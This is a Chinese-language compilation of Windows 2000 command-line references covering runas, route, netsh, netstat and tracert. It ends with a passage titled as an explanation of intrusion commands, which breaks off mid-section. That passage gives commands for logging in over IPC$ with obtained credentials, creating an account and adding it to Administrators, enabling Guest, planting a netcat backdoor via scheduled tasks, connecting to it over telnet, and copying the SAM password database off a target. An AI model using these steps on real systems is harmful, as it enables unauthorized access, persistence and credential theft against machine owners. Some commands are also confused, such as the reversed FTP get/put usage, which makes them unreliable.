指定在其下运行程序的用户帐户的名称。用户帐户的格式应是 user@domain 或 domain\user。
程序
指定要用在 /user 中指定的帐户运行的程序或命令。
/?
在命令提示符显示帮助。
注释
管理员可以使用一个权限受限制的帐户执行日常、非管理性的任务,只有在执行特定管理任务时,才使用一个权限更大的帐户。要不经过注销再重新登录就完成这样的任务,可以用一般帐户登录,然后使用 runas 命令来运行需要更大权限的工具。
有关 runas 命令的使用范例,请参阅"相关主题"。
尽管 runas 通常由 Administrator 帐户使用,但并非仅限于 Administrator 帐户。任何拥有多个帐户的用户均可以利用备用凭据,使用 runas 运行程序、MMC 控制台或"控制面板"项。
如果要在计算机上使用 Administrator 帐户,对于 /user:,键入下列参数之一:
/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName
如果想以域管理员身份使用这个命令,键入下列参数之一:
/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas 命令允许您运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序和保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一组(例如"Users"或"Power Users"组)的成员登录到计算机时,可以以管理员的身份运行。
可以使用 runas 命令来启动任何程序、MMC 控制器或"控制面板"项。只要提供适当的用户帐户和密码信息,用户帐户就具有登录到计算机的能力,并且程序、MMC 控制台、"控制面板"项在系统中及对该用户帐户均可用.
runas 命令允许您管理其他域的服务器(运行工具的计算机和要管理的服务器在不同的域中)。
如果尝试使用 runas 从网络位置启动程序、MMC 控制台或"控制面板"项,可能会因为用来连接网络共享的凭据与用来启动程序的凭据不同而失败。后者的凭据可能无法访问同一网络共享。
有些项,例如"打印机"文件夹和桌面项,间接由 Windows 2000 打开,而不能使用 runas 命令启动。
如果 runas 命令失败,则可能是没有运行 RunAs 服务或使用的用户帐户无效。要检查 RunAs 服务的状态,请在"计算机管理"中单击"服务和应用程序",然后单击"服务"。要测试用户帐户,请尝试使用该帐户登录合适的域。
范例
要在本地计算机上以管理员身份启动 Windows 2000 命令提示行实例,请键入:
runas /user:localmachinename\administrator cmd
系统提示时,键入管理员密码。
要使用名为 companydomain\domainadmin 的域管理员帐户启动"计算机管理"管理单元实例,请键入:runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"
当提示时,键入帐户密码。
要使用名为 domain.microsoft.com 的域中的域管理员帐户 user 启动"记事本"实例,请键入:
runas /user:user@domain.microsoft.com "notepad my_file.txt"
当提示时,键入帐户密码。
要启动命令提示符行窗口、保存的 MMC 控制台、控制面板项或管理其他地点服务器的程序的一个实例,请键入:
runas /netonly /user:domain\username "command"
domain\username 必须是有足够权限管理服务器的用户。当提示时,键入帐户密码。
19.Route
在本地 IP 路由表中显示和修改条目。使用不带参数的 route 可以显示帮助。
语法
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]
参数
-f
清除所有不是主路由(网掩码为 255.255.255.255 的路由)、环回网络路由(目标为 127.0.0.0,网掩码为 255.255.255.0 的路由)或多播路由(目标为 224.0.0.0,网掩码为 240.0.0.0 的路由)的条目的路由表。如果它与命令之一(例如 add、change 或 delete)结合使用,表会在运行命令之前清除。
-p
与 add 命令共同使用时,指定路由被添加到注册表并在启动 TCP/IP 协议的时候初始化 IP 路由表。默认情况下,启动 TCP/IP 协议时不会保存添加的路由。与 print 命令一起使用时,则显示永久路由列表。所有其它的命令都忽略此参数。永久路由存储在注册表中的位置是 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes。
Command
指定要运行的命令。下表列出了有效的命令。命令 目的
add 添加路由
change 更改现存路由
delete 删除路由
print 打印路由
Destination
指定路由的网络目标地址。目标地址可以是一个 IP 网络地址(其中网络地址的主机地址位设置为 0),对于主机路由是 IP 地址,对于默认路由是 0.0.0.0。
mask subnetmask
指定与网络目标地址相关联的网掩码(又称之为子网掩码)。子网掩码对于 IP 网络地址可以是一适当的子网掩码,对于主机路由是 255.255.255.255 ,对于默认路由是 0.0.0.0。如果忽略,则使用子网掩码 255.255.255.255。定义路由时由于目标地址和子网掩码之间的关系,目标地址不能比它对应的子网掩码更为详细。换句话说,如果子网掩码的一位是 0,则目标地址中的对应位就不能设置为 1。
Gateway
指定超过由网络目标和子网掩码定义的可达到的地址集的前一个或下一个跃点 IP 地址。对于本地连接的子网路由,网关地址是分配给连接子网接口的 IP 地址。对于要经过一个或多个路由器才可用到的远程路由,网关地址是一个分配给相邻路由器的、可直接达到的 IP 地址。
metric Metric
为路由指定所需跃点数的整数值(范围是 1 ~ 9999),它用来在路由表里的多个路由中选择与转发包中的目标地址最为匹配的路由。所选的路由具有最少的跃点数。跃点数能够反映跃点的数量、路径的速度、路径可靠性、路径吞吐量以及管理属性。
if Interface
指定目标可以到达的接口的接口索引。使用 route print 命令可以显示接口及其对应接口索引的列表。对于接口索引可以使用十进制或十六进制的值。对于十六进制值,要在十六进制数的前面加上 0x。忽略 if 参数时,接口由网关地址确定。
/?
在命令提示符显示帮助。
注释
路由表中 跃点数 一列的值较大是由于允许 TCP/IP 根据每个 LAN 接口的 IP 地址、子网掩码和默认网关的配置自动确定路由表中路由的跃点数造成的。默认启动的自动确定接口跃点数确定了每个接口的速度,调整了每个接口的路由跃点数,因此最快接口所创建的路由具有最低的跃点数。要删除大跃点数,请在每个 LAN 连接的 TCP/IP 协议的高级属性中禁用自动确定接口跃点数。
如果在 systemroot\System32\Drivers\Etc 文件夹的本地网络文件中存在适当的条目,名称可以用于 Destination。只要名称可以通过"域名系统" (DNS) 查询这样的标准主机名解析技术分解为 IP 地址,就可以将其用于 Gateway,DNS 查询使用存储在 systemroot\System32\Drivers\Etc 文件夹下的本地主机文件和 NetBIOS 名称解析。
如果是 print 或 delete 命令,可以忽略 Gateway 参数,使用通配符来表示目标和网关。Destination 的值可以是由星号 (*) 指定的通配符。如果指定目标含有一个星号 (*) 或问号 (?),它被看作是通配符,只打印或删除匹配的目标路由。星号代表任意一字符序列,问号代表任一字符。例如,10.*.1, 192.168.*、 127.* 和 *224* 都是星号通配符的有效使用。
使用了无效的目标和子网掩码(网掩码)值的组合,会显示"Route:bad gateway address netmask"错误消息。目标中有一位或多位设置为 1,而其在子网掩码中的对应位设置为 0 时会发生这个错误。可以通过二进制表示法表示目标和子网掩码来检查这种情况。以二进制表示的子网掩码包括表示目标网络地址部分的一连串的 1 和表示目标主机地址部分的一连串的 0 两个部分。查看目标以确定目标的主机地址部分(由子网掩码所定义)是否有些位设置成了 1。
只有 Windows NT 4.0、Windows 2000、Windows Millennium Edition 和 Windows XP 的 route 命令支持 -p 参数。Windows 95 或 Windows 98 的 route 命令不支持该参数。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示 IP 路由表的完整内容,请键入:
route print
要显示 IP 路由表中以 10.开始的路由,请键入:
route print 10.*
要添加默认网关地址为 192.168.12.1 的默认路由,请键入:
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1 的永久路由,请键入:
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,跃点数为 7 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
要添加目标为 10.41.0.0,子网掩码为 255.255.0.0,下一个跃点地址为 10.27.0.1,接口索引为 0x3 的路由,请键入:
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
要删除目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由,请键入:
route delete 10.41.0.0 mask 255.255.0.0
要删除 IP 路由表中以 10.开始的所有路由,请键入:
route delete 10.*
要将目标为 10.41.0.0,子网掩码为 255.255.0.0 的路由的下一个跃点地址由 10.27.0.1 更改为 10.27.0.25,请键入:
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
怎样在windowsserver的cmd下更改ip地址■■■ -> Windows 2k/2003 Server
在命令行下更改ip地址
Windows2000是现在比较流行的操作系统,它的功能是很强大的,它甚至可以象Unix一样在命令行下做很多的工作。下面一种在命令行下更改ip地址的方法,现介绍给大家(括号里是一些注释,黑体字是人工录入的):
C:\>ipconfig (首先用ipconfig这个命令看一下更改之前的ip地址)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 (本地连接更改之前的ip)
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh (进入设置模式)
netsh>interface
interface>ip
interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
上文中的set命令具体解释如下:
set address - 设置指定的接口的 IP 地址和默认网关。
set dns - 设置 DNS 服务器模式和地址。
set wins - 设置 WINS 服务器模式和地址。
网络常用命令:
IPCONFIG
C:\>ipconfig (更改后再用ipconfig命令看一下,确认一下是否更改成功)
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
命令一览
..- 移到上一层上下文级。
? - 显示命令列表。
aaaa - 更改到 `aaaa' 上下文。
abort - 丢弃在脱机模式下所做的更改。
add - 将一个配置项添加到项目列表中。
alias - 添加一个别名
bye - 退出程序。
commit - 提交在脱机模式中所做的更改。
delete - 在项目列表上删除一个配置项目。
dhcp - 更改到 `dhcp' 上下文。
dump - 显示一个配置脚本。
exec - 运行一个脚本文件。
exit - 退出程序。
help - 显示命令列表。
interface - 更改到 `interface' 上下文。
offline - 将当前模式设置成脱机。
online - 将当前模式设置成联机。
popd - 从堆栈上打开一个上下文。
pushd - 将当前上下文放推入堆栈。
quit - 退出程序。
ras - 更改到 `ras' 上下文。
routing - 更改到 `routing' 上下文。
set - 更新配置设置。
show - 显示信息
unalias - 删除一个别名。
wins - 更改到 `wins' 上下文。
快速切换IP地址有绝招
在工作过程中会遇到在不同的网段中进行网络调试的情况,经常需要将机器在几个不同的IP地址中进行切换。在Win2000操作系统中改变IP地址较之Win98已经方便多了因为改完IP地址后不需要重启计算机 ,但还要进入网络属性设置中进行操作。有没有再简便一点的方法呢,比如用鼠标双击一下快捷方式就可以实现IP地址的切换?
答案是肯定的。在Win2000中用netsh命令就可以实现这个功能。首先进入命令行模式(在"开始→运行"中键入"cmd"即可进入命令行模式),在提示符下键入netsh即可进入netsh的界面。再键入int ip进入接口IP的配置模式,键入dump则列出接口IP配置信息:
C:\Documents and Settings\Administrator>netsh
netsh>
netsh>int ip
interface ip>dump
# ----------------------------------
# 接口 IP 配置
# ----------------------------------
pushd interface ip
# ″本地连接″ 的接口IP 配置(注:以下显示视具体机器情况而定)
set address name = ″本地连接″ source = static addr = 192.168.0.5 mask = 255.255.255.0
set address name = ″本地连接″ gateway = 192.168.0.2 gwmetric = 1
set dns name = ″本地连接″ source = static addr = 61.237.17.181
add dns name = ″本地连接″ addr = 211.97.168.129
add dns name = ″本地连接″ addr = 211.98.4.1
set wins name = ″本地连接″ source = static addr = none
# ″本地连接 2″ 的接口 IP 配置
set address name = ″本地连接 2″ source = dhcp
set dns name = ″本地连接 2″ source = dhcp
set wins name = ″本地连接 2″ source = dhcp
popd
# 接口 IP 配置结束
快速切换IP地址有绝招 2
现在我们可以大致了解到用netsh命令更改IP地址的方式,即通过"set address name =连接名称(连接名称要用引号括起来)source=static addr=IP地址 mask=子网掩码"来实现。
到命令行模式下用netsh直接试一下。比如要将本机的IP地址改为192.168.0.7,子网掩码为255.255.255.0,可以进行以下操作:
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name ="本地连接"source = static addr = 192.168.0.7 mask = 255.255.255.0
确认更改。
interface ip>exit
再用ipconfig命令核实一下:
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接 2
Media State ........... Cable Disconnected
Ethernet adapter 本地连接
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
从以上显示中可以看到已经成功实现了在Win2000中用命令行方式来改变IP地址。用这种方式改变IP地址甚至还没有在图形界面中操作来得快。不过我们再用脚本帮一下忙,离胜利目标就不远了。首先打开记事本,输入以下内容:  int ip
set address name=″本地连接″ source=static addr=192.168.0.7 mask=255.255.255.0
然后保存为一个名为"7.sh"的文件,放到C盘根目录下,再进入命令行模式,在C盘根目录下键入"netsh exec 7.sh",好像没什么反应啊?不过再用ipconfig查看一下,会发现IP地址已经改过来了。
最后再用记事本写一个批处理文件,命名为"7.bat",内容为"netsh exec 7.sh"。为该文件在桌面上创建一个快捷方式,这样双击该快捷方式即可实现IP地址的快速改变。如果要快速在192.168.0.5、192.168.0.7等相同网段IP地址间进行切换的话,只需要改变"addr"后面的地址即可,但是要将IP地址改为如172.19.96.7之类不同网段的IP地址,就需要将网关信息一起改变,也就是在脚本文件中加入一行关于网关的信息:
int ip
set address name = ″本地连接″source = static addr= 172.19.96.7 mask = 255.255.255.0
set address name = ″本地连接″gateway = 172.19.96.1 gwmetric = 1
同样地将以上内容存为脚本文件,再做成批处理文件执行一下,用ipconfig/all命令检测一下,发现包括网关在内的信息也修改过来了。这是不是既快又方便,IP地址想换就换?
使用 netstat 显示连接统计
可以使用 netstat 命令显示协议统计信息和当前的 TCP/IP 连接。netstat -a 命令将显示所有连接,而 netstat -r 显示路由表和活动连接。netstat -e 命令将显示 Ethernet 统计信息,而 netstat -s 显示每个协议的统计信息。如果使用 netstat -n,则不能将地址和端口号转换成名称。
Tracert(跟踪路由)是路由跟踪实用程序,用于确定 IP 数据报访问目标所采取的路径。Tracert 命令用 IP 生存时间 (TTL) 字段和 ICMP 错误消息来确定从一个主机到网络上其他主机的路由。
-d 指定不将IP 地址解析到主机名称。
-h maximum_hops 指定跃点数以跟踪到称为 target_name 的主机的路由。
-j host-list 指定 Tracert 实用程序数据包所采用路径中的路由器接口列表。
-w timeout 等待 timeout 为每次回复所指定的毫秒数。
target_name 目标主机的名称或 IP 地址。
pathping 命令是一个路由跟踪工具,它将 ping 和 tracert 命令的功能和这两个工具所不提供的其他信息结合起来。pathping 命令在一段时间内将数据包发送到到达最终目标的路径上的每个路由器,然后基于数据包的计算机结果从每个跃点返回。由于命令显示数据包在任何给定路由器或链接上丢失的程度,因此可以很容易地确定可能导致网络问题的路由器或链接。
-n Hostnames 不将地址解析成主机名。
-h Maximum hops 搜索目标的最大跃点数。
-g Host-list 沿着路由列表释放源路由。
-p Period 在 ping 之间等待的毫秒数。
-q Num_queries 每个跃点的查询数。
-w Time-out 为每次回复所等待的毫秒数。
-T Layer 2 tag 将第 2 层优先级标记(例如,对于 IEEE 802.1p)连接到数据包并将它发送到路径中的每个网络设备。这有助于标识没有正确配置第 2 层优先级的网络设备。-T 开关用于测试服务质量 (QoS) 连通性。
-R RSVP test Che 检查以确定路径中的每个路由器是否支持"资源保留协议 (RSVP)",此协议允许主机为数据流保留一定量的带宽。-R 开关用于测试服务质量 (QoS) 连通性。
在命令提示符下交互使用 DHCP 命令
打开 命令提示符。
键入 netsh。
在 netsh>(Netshell) 命令提示行键入"dhcp"。
在 dhcp>(DHCP 辅助程序)命令提示行,为您要管理的服务器键入 server \\servername 或 server ip_address。
一旦您有权管理的服务器已成功连接,则会看到"您可以对服务器 servername 进行读写访问"
一旦连接成功,您就可以使用用于 DHCP 的任何支持的 Netshell 命令。键入 /? 或 help 来显示直接的 DHCP 子命令菜单或作为选项显示,键入 list 列出可与 DHCP 一起使用的所有 Netshell 子命令。
route 的命令
routing ip add/delete/set/show interface 在指定接口上添加、删除、配置或显示常规 IP 路由设置。
routing ip add/delete/set/show filter 在指定接口上添加、删除、配置或显示 IP 数据包筛选器。
routing ip add/delete/show boundary 在指定接口上添加、删除或显示多播边界设置。
routing ip add/set ipiptunnel 添加或配置 IP 中的 IP 接口。
routing ip add/delete/set/show rtmroute 添加、配置或显示不持续的路由表管理器路由。
routing ip add/delete/set/show persistentroute 添加、删除、配置或显示持续路由。
routing ip add/delete/set/show preferenceforprotocol 添加、删除、配置或显示路由协议的优先级。
routing ip add/delete/set/show scope 添加、删除或显示多播作用域。
routing ip set/show loglevel 配置或显示全局 IP 记录等级。
routing ip show helper 显示 IP 的所有 Netsh 实用程序子环境。
routing ip show protocol 显示所有正在运行的 IP 路由协议。
routing ip show mfe 显示多播转发项。
routing ip show mfestats 显示多播转发项统计。
routing ip show boundarystats 显示 IP 多播边界。
routing ip show r*estinations 显示路由表管理器路由表中的目标。
routing ip show rtmroutes 显示路由表管理器路由表中的路由。
routing ip nat set/show global 配置或显示全局网络地址转换 (NAT) 设置。
routing ip nat add/delete/set/show interface 添加、删除、配置或显示指定接口的 NAT 设置。
routing ip nat add/delete addressrange 在 NAT 接口公用地址池中添加或删除一个地址范围。
routing ip nat add/delete addressmapping 添加或删除 NAT 地址映射。
routing ip nat add/delete portmapping 添加或删除 NAT 端口映射。
routing ip autodhcp set/show global 配置或显示全局 DHCP 分配器参数。
routing ip autodhcp set/show interface 配置或显示指定接口的 DHCP 分配器设置。
routing ip autodhcp add/delete exclusion 在 DHCP 分配器地址范围中添加或删除一个排除范围。
routing ip dnsproxy set/show global 配置或显示全局 DNS 代理参数。
routing ip dnsproxy set/show interface 配置或显示指定接口的 DNS 代理参数。
routing ip igmp set/show global 配置或显示 IGMP 全局设置。
routing ip igmp add/delete/set/show interface 在指定接口上添加、删除、配置或显示 IGMP。
routing ip igmp add/delete staticgroup 添加或删除指定接口的静态多播组。
routing ip igmp show grouptable 显示 IGMP 主机组表。
routing ip igmp show ifstats 显示每个接口的 IGMP 统计。
routing ip igmp show iftable 显示每个接口的 IGMP 主机组。
routing ip igmp show proxygrouptable 显示 IGMP 代理接口的 IGMP 组表。
routing ip igmp show rasgrouptable 显示远程访问服务器所使用的 Internet 接口的组表。
routing ip ospf set/show global 配置或显示全局 OSPF 设置。
routing ip ospf add/delete/set/show interface 在指定接口上添加、删除、配置或显示 OSPF。
routing ip ospf add/delete/set/show area 添加、删除、配置或显示 OSPF 区域。
routing ip ospf add/delete/show range 在指定的 OSPF 区域上添加、删除、配置或显示范围。
routing ip ospf add/delete/set/show virtif 添加、删除、配置或显示 OSPF 虚拟接口。
routing ip ospf add/delete/show neighbor 添加、删除、配置或显示 OSPF 邻居。
routing ip ospf add/delete/show protofilter 添加、删除、配置或显示 OSPF 外部路由的路由信息源。
routing ip ospf add/delete/show routefilter 添加、删除、配置或显示 OSPF 外部路由的路由筛选。
routing ip ospf show areastats 显示 OSPF 区域统计。
routing ip ospf show lsdb 显示 OSPF 链接状态数据库。
routing ip ospf show virtifstats 显示 OSPF 虚拟链接统计。
routing ip relay set global 配置"DHCP 中继代理程序"的全局设置。
routing ip relay add/delete/set interface 在指定接口上添加、删除或配置"DHCP 中继代理程序"设置。
routing ip relay add/delete dhcpserver 在 DHCP 服务器地址列表中添加或删除 DHCP 服务器的 IP 地址。
routing ip relay show ifbinding 显示接口的 IP 地址绑定。
routing ip relay show ifconfig 显示每个接口的"DHCP 中继代理程序"配置。
routing ip relay show ifstats 显示每个接口的 DHCP 统计。
routing ip rip set/show global 配置 IP 的 RIP 全局设置。
routing ip rip add/delete/set/show interface 在指定接口上添加或配置 IP 的 RIP 设置。
routing ip rip add/delete peerfilter 添加或删除 RIP 对等筛选器。
routing ip rip add/delete acceptfilter 在接受的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete announcefilter 在公布的路由列表中添加或删除 RIP 路由筛选器。
routing ip rip add/delete/show neighbor 添加或删除 RIP 邻居。
routing ip rip set/show flags 在指定接口上配置 IP RIP 高级设置。
routing ip rip show globalstats 显示全局 RIP 参数。
routing ip rip show ifbinding 显示接口的 IP 地址绑定。
routing ip rip show ifstats 显示每个接口的 RIP 统计。
IPX netsh 路由命令
routing ipx add/set staticroute 在 IPX 路由表中添加或配置静态 IPX 路由。
routing ipx add/set staticservice 在 SAP 服务表中添加或配置静态 SAP 服务。
routing ipx add/set filter 在指定的接口上添加或配置 IPX 数据包筛选器。
routing ipx add/set interface 在请求拨号接口上启用 IPX 路由,或在指定的接口上配置 IPX 设置。
routing ipx set global 配置全局 IPX 路由设置。
routing ipx rip add/set filter 添加和配置 RIP 路由筛选器。
routing ipx rip set global 配置全局 IPX 的 RIP 设置。
routing ipx rip set interface 在指定接口上配置 IPX 的 RIP 设置。
routing ipx sap add/set filter 添加或配置 SAP 服务筛选器。
routing ipx sap set global 配置全局 IPX 的 SAP 设置。
routing ipx sap set interface 在指定接口上配置 IPX 的 SAP 设置。
routing ipx netbios add nbname 将静态 NETBIOS 名称添加到 IPX NetBIOS 名称表中。
routing ipx netbios set interface 在指定接口上配置基于 IPX 的 NetBIOS 设置。
WINS NetSh 命令
list 列出所有可用的 WINS 命令。
dump 将 WINS 服务器配置转储到命令输出。
add name 在服务器上注册名称。详细信息,请输入 add name /?
add partner 向服务器添加复制伙伴。详细信息,请输入 add partner /?
add pngserver 添加当前服务器的 Persona Non Grata 服务器列表。详细信息,请输入 add pngserver /?
check database 检查数据库的一致性。详细信息,请输入 check database /?
check name 检查一组 WINS 服务器的名称记录列表。详细信息,请输入 check name /?
check version 检查版本号的一致性。详细信息,请输入 check version /?
delete name 从服务器数据库中删除已注册的名称。详细信息,请输入 delete name /?
delete partner 从复制伙伴列表中删除复制伙伴。详细信息,请输入 delete partner /?
delete records 从服务器删除或逻辑删除所有记录或一组记录。详细信息,请输入 delete records /?
delete owners 删除所有者列表及其记录。详细信息,请输入 delete owners /?
delete pngserver 从列表中删除所有的或选定的 Persona Non Grata 服务器。详细信息,请输入 delete pngserver /?
init backup 备份 WINS 数据库。详细信息,请输入 init backup /?
init import 从 Lmhosts 文件导入数据。详细信息,请输入 init import /?
init pull 启动"拉"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init pull /?
init pullrange 开始另一台 WINS 服务器的一组记录,并读取该记录。详细信息,请输入 init pullrange /?
init push 启动"推"触发器,并发送给另一台 WINS 服务器。详细信息,请输入 init push /?
init replicate 用复制伙伴复制数据库。详细信息,请输入 init replicate /?
init restore 从文件还原数据库。详细信息,请输入 init restore /?
init scavenge 清除服务器的 WINS 数据库。详细信息,请输入 init scavenge /?
init search 搜索服务器的 WINS 数据库。详细信息,请输入 init search /?
reset statistics 重置服务器的统计信息。详细信息,请输入 reset statistics /?
set autopartnerconfig 设置服务器的自动复制伙伴配置信息。详细信息,请输入 set autopartnerconfig /?
set backuppath 设置服务器的备份参数。详细信息,请输入 set backuppath /?
set burstparam 设置服务器的突发处理参数。详细信息,请输入 set autopartnerconfig /?
set logparam 设置数据库和事件日志记录选项。详细信息,请输入 set logparam /?
set migrateflag 设置服务器的迁移标志。详细信息,请输入 set migrateflag /?
set namerecord 设置服务器的间隔和超时值。详细信息,请输入 set namerecord /?
set periodicdbchecking 设置服务器的定期数据库检查参数。详细信息,请输入 set periodicdbchecking /?
set pullpartnerconfig 设置指定的"拉"伙伴的配置参数。详细信息,请输入 set pullpartnerconfig /?
set pushpartnerconfig 设置指定的"推"伙伴的配置参数。详细信息,请输入 set pushpartnerconfig /?
set pullparam 设置服务器的默认"拉"参数。详细信息,请输入 set pullparam /?
set pushparam 设置服务器的默认"推"参数。详细信息,请输入 set pushparam /?
set replicateflag 设置服务器的复制标志。详细信息,请输入 set replicateflag /?
set startversion 设置数据库的开始版本 ID。详细信息,请输入 set startversion /?
show browser 显示所有活动域主浏览器的 [1Bh] 记录。详细信息,请输入 show browser /?
show database 显示指定服务器的数据库和记录。详细信息,请输入 show database /?
show info 显示配置信息。详细信息,请输入 show info /?
show name 显示服务器中特定记录的详细信息。详细信息,请输入 show name /?
show partner 显示服务器的"拉"或"推"(或"推拉")伙伴。详细信息,请输入 show partner /?
show partnerproperties 显示默认伙伴配置。详细信息,请输入 show partnerproperties /?
show pullpartnerconfig 显示"拉"伙伴的配置信息。详细信息,请输入 show pullpartnerconfig /?
show pushpartnerconfig 显示"推"伙伴的配置信息。详细信息,请输入 show pushpartnerconfig /?
show reccount 显示指定服务器所拥有的记录数量。详细信息,请输入 show reccount /?
show recbyversion 显示指定服务器所拥有的记录。详细信息,请输入 show recbyversion /?
show server 显示当前选定的服务器。详细信息,请输入 show server /?
show statistics 显示 WINS 服务器的统计信息。详细信息,请输入 show statistics /?
show version 显示 WINS 服务器的当前版本计数器值。详细信息,请输入 show version /?
show versionmap 显示所有者 ID 到"最大版本数"的映射。详细信息,请输入 show versionmap /?
Interface 命令
interface set/show interface 启用、禁用、连接、断开连接以及显示请求拨号接口的配置。
interface set/show credentials 在请求拨号接口上配置或显示用户名、密码和域名
第5章
入侵命令详解
1:NET
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx null密码为空
退出的命令是
net use \\127.0.0.1\ipc$ /delete
net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:\winnt\system32
这样这个机器就有了一个名为me的共享目录,而打开它就是winnt下的system32目录,如果你用win2000的系统就知这个目录有多重要了,如果不想要也好办net
share me /delete 呵呵,没有了,是不是很方便的啊。
下面的操作你必须登陆后才可以用.登陆的方法就在上面.
下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.
我们加一个heibai的用户密码为lovechina
net user heibai lovechina /add
只要显示命令成功,那么我们可以把他加入Administrator组了.
net localgroup Administrators heibai /add
这里是讲映\*对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映\*到本地的Z盘.
net use z:\\127.0.0.1\c$
net start telnet
这样可以打开对方的TELNET服务.
这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。
net user guest /active:yes(特别注意:这个命令是把原来被禁用的guest帐户再次激活)
net user guest /active:no这样这个guest的用户就又被禁用了
这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!
net user guest lovechina
有人问到提高权限的问题 下面就解决下
net localgroup administrators guest /add
将guest变为administrator
net命令果然强大啊! net view命令看对方开了共享
net user是查看所有用户列表,看看哪个用户是和你一样偷跑进来的,给他名给删掉,让他美,
net user 用户名
/delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net
localgroup
administrators就列出管理员组成员了,再查看一下administrator这个用户,因为这个是创建系统时建出来的,所以要看看他的系统是什么时间创建出来的
net user
administrator,然后再查看别的管理员用户是什么时间创建的,如果相差太远,那可能是被别人偷偷跑来偷建的,一律del,安全第一哦................
2:at
一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?
那么需要用AT命令,这里假设你已经登陆了那个服务器。
你首先要得到对方的时间,
net time \\127.0.0.1
将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1
at \\127.0.0.1 12:3 nc.exe
这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.
这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.
等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.
at命令功能强大,下面可以打个比方:
C:\> AT 22:30 Start C:\prettyboy.mp3
新加了一项作业,其作业 ID = 1 [现在我们新建立了一个任务 在22:30分 系统将自动播放歌曲]
3:telnet
这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.
telnet 127.0.0.1 99
这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.
4:FTP
它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.
在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321
ftpwww.51.net
他会要求输入用户,成功后会要求输入密码.
----------------------
下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\
get c:\index.htm d:\
假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下
put c:\index.htm d:\
5:copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下
copy index.htm \\127.0.0.1\c$\index.htm
如果你要复制到D盘下把C改为D,就行了!
copy index.htm \\127.0.0.1\d$\index.htm
如果你要把他复制到WINNT目录里
就要把输入
copy index.htm \\127.0.0.1\admin$\index.htm
admin$是winnt
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名
下面就把127.0.0.1的数据库复制到本地C盘下
copy \\127.0.0.1\admin$\repair\sam._ c:\
6:set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip,deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98;
